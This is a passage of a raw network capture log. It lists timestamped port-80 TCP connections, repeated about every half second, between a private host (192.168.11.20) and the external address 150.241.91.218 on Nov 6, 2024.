                                                                                                                                                              Nov 6, 2024 17:36:10.429702997 CET4985980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:10.429702997 CET4985980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:10.617620945 CET8049859150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:10.617640018 CET8049859150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:10.683495998 CET8049859150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:10.695117950 CET4985980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:10.695730925 CET4986080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:10.884007931 CET8049859150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:10.884120941 CET8049860150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:10.884246111 CET4985980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:10.884314060 CET4986080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:10.884380102 CET4986080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:10.884380102 CET4986080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.072746992 CET8049860150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:11.072804928 CET8049860150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:11.143487930 CET8049860150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:11.154103994 CET4986080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.154506922 CET4986180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.342123032 CET8049860150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:11.342207909 CET8049861150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:11.342343092 CET4986080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.342376947 CET4986180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.342549086 CET4986180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.342550039 CET4986180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.530565023 CET8049861150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:11.530603886 CET8049861150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:11.601583958 CET8049861150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:11.642236948 CET4986180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.783101082 CET4986180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.783663034 CET4986280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.971405029 CET8049861150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:11.971683025 CET4986180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.972537041 CET8049862150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:11.972778082 CET4986280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.972929955 CET4986280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:11.972929955 CET4986280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.160991907 CET8049862150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:12.161000967 CET8049862150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:12.232306957 CET8049862150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:12.243644953 CET4986280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.244308949 CET4986380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.431505919 CET8049862150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:12.431658030 CET4986280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.431849957 CET8049863150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:12.432044983 CET4986380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.432168961 CET4986380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.432168961 CET4986380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.620057106 CET8049863150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:12.620115995 CET8049863150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:12.683456898 CET8049863150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:12.695295095 CET4986380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.695771933 CET4986480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.883054972 CET8049863150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:12.883289099 CET4986380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.884187937 CET8049864150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:12.884419918 CET4986480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.884582043 CET4986480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:12.884582043 CET4986480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.073286057 CET8049864150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:13.073355913 CET8049864150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:13.144932985 CET8049864150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:13.157417059 CET4986480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.157646894 CET4986580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.345391035 CET8049865150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:13.345622063 CET8049864150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:13.345700979 CET4986580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.345803976 CET4986480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.345937014 CET4986580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.345937014 CET4986580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.534303904 CET8049865150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:13.534393072 CET8049865150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:13.601177931 CET8049865150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:13.621061087 CET4986580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.621866941 CET4986680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.809052944 CET8049865150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:13.809295893 CET4986580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.810307026 CET8049866150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:13.810636997 CET4986680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.810843945 CET4986680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.810843945 CET4986680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:13.998897076 CET8049866150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:13.999209881 CET8049866150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:14.069468021 CET8049866150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:14.081684113 CET4986680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.082178116 CET4986780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.270169973 CET8049867150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:14.270183086 CET8049866150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:14.270349026 CET4986680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.270417929 CET4986780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.270554066 CET4986780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.270554066 CET4986780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.458321095 CET8049867150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:14.458374023 CET8049867150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:14.527519941 CET8049867150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:14.540059090 CET4986780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.540721893 CET4986880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.728072882 CET8049867150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:14.728363037 CET4986780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.729298115 CET8049868150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:14.729492903 CET4986880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.729640961 CET4986880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.729640961 CET4986880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:14.917313099 CET8049868150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:14.917411089 CET8049868150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:14.989159107 CET8049868150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:15.001352072 CET4986880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.001774073 CET4986980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.189690113 CET8049869150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:15.189747095 CET8049868150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:15.189909935 CET4986880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.189909935 CET4986980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.190052032 CET4986980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.190052032 CET4986980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.378156900 CET8049869150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:15.378168106 CET8049869150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:15.445862055 CET8049869150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:15.457648993 CET4986980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.458158970 CET4987080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.645776987 CET8049869150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:15.645833015 CET8049870150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:15.645994902 CET4986980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.646035910 CET4987080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.646194935 CET4987080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.646194935 CET4987080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.833826065 CET8049870150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:15.833986998 CET8049870150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:15.903321981 CET8049870150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:15.917232990 CET4987080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:15.917687893 CET4987180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.104710102 CET8049870150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:16.105029106 CET4987080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.105679989 CET8049871150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:16.106005907 CET4987180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.106142998 CET4987180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.106142998 CET4987180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.293780088 CET8049871150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:16.293884039 CET8049871150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:16.364360094 CET8049871150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:16.380347013 CET4987180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.381011963 CET4987280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.570085049 CET8049871150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:16.570126057 CET8049872150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:16.570374012 CET4987280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.570375919 CET4987180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.570566893 CET4987280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.570566893 CET4987280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.758668900 CET8049872150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:16.758693933 CET8049872150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:16.917460918 CET8049872150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:16.930960894 CET4987280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:16.931685925 CET4987380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.118798971 CET8049872150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:17.118959904 CET4987280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.119246960 CET8049873150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:17.119453907 CET4987380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.119524002 CET4987380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.119524002 CET4987380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.307030916 CET8049873150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:17.307040930 CET8049873150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:17.375394106 CET8049873150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:17.386750937 CET4987380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.387294054 CET4987480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.575000048 CET8049873150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:17.575316906 CET4987380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.575417995 CET8049874150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:17.575680017 CET4987480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.575769901 CET4987480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.575771093 CET4987480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.764440060 CET8049874150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:17.764494896 CET8049874150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:17.833642006 CET8049874150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:17.844235897 CET4987480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:17.844715118 CET4987580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:18.032708883 CET8049874150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:18.032893896 CET4987480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:18.033427954 CET8049875150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:18.033684969 CET4987580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:18.033814907 CET4987580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:18.033816099 CET4987580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:18.226038933 CET8049875150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:18.226054907 CET8049875150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:18.589004040 CET8049875150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:18.606434107 CET4987580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:18.607418060 CET4987680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:18.795624018 CET8049876150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:18.795680046 CET8049875150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:18.795907021 CET4987680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:18.795907974 CET4987580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:18.796365976 CET4987680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:18.796365976 CET4987680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:18.984575987 CET8049876150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:18.984631062 CET8049876150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.053623915 CET8049876150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.069230080 CET4987680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.069751024 CET4987780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.257570028 CET8049877150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.257760048 CET4987780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.257838964 CET4987780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.257838964 CET4987780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.257919073 CET8049876150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.258121014 CET4987680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.445952892 CET8049877150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.445966959 CET8049877150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.515274048 CET8049877150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.530492067 CET4987780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.531085968 CET4987880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.718545914 CET8049877150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.718883038 CET4987780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.719377041 CET8049878150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.719609022 CET4987880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.719686985 CET4987880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.719686985 CET4987880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.908149004 CET8049878150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.908195019 CET8049878150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.979708910 CET8049878150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:19.990489960 CET4987880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:19.990984917 CET4987980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.179631948 CET8049878150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:20.179933071 CET8049879150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:20.179956913 CET4987880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.180079937 CET4987980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.180217028 CET4987980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.180217028 CET4987980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.369036913 CET8049879150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:20.369067907 CET8049879150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:20.435647964 CET8049879150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:20.447587013 CET4987980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.447993994 CET4988080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.635813951 CET8049879150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:20.635843992 CET8049880150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:20.636055946 CET4988080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.636059999 CET4987980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.636214972 CET4988080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.636214972 CET4988080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.824285984 CET8049880150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:20.824331999 CET8049880150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:20.892093897 CET8049880150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:20.907342911 CET4988080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:20.907768965 CET4988180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.095485926 CET8049880150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:21.095742941 CET4988080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.095932007 CET8049881150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:21.096132994 CET4988180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.096309900 CET4988180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.096309900 CET4988180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.284297943 CET8049881150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:21.284647942 CET8049881150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:21.350871086 CET8049881150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:21.365319967 CET4988180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.366430998 CET4988280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.553788900 CET8049881150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:21.554008961 CET4988180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.554425001 CET8049882150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:21.554670095 CET4988280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.554785967 CET4988280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.554785967 CET4988280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.742820024 CET8049882150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:21.742836952 CET8049882150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:21.811357021 CET8049882150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:21.832150936 CET4988280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:21.832948923 CET4988380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.023782015 CET8049883150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.023801088 CET8049882150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.024075985 CET4988280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.024075985 CET4988380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.024261951 CET4988380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.024261951 CET4988380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.211924076 CET8049883150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.211941004 CET8049883150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.281352997 CET8049883150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.300362110 CET4988380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.300944090 CET4988480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.487906933 CET8049883150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.488084078 CET4988380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.488899946 CET8049884150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.489161968 CET4988480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.489334106 CET4988480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.489334106 CET4988480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.677207947 CET8049884150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.677325010 CET8049884150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.746578932 CET8049884150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.766850948 CET4988480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.767502069 CET4988580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.955147982 CET8049884150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.955416918 CET4988480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.955869913 CET8049885150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:22.956065893 CET4988580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.956223011 CET4988580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:22.956223011 CET4988580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:23.144217014 CET8049885150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:23.144720078 CET8049885150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:23.517568111 CET8049885150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:23.528542042 CET4988580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:23.528964996 CET4988680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:23.716576099 CET8049886150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:23.716870070 CET4988680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:23.717044115 CET4988680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:23.717044115 CET4988680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:23.717780113 CET8049885150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:23.717978001 CET4988580192.168.11.20150.241.91.218
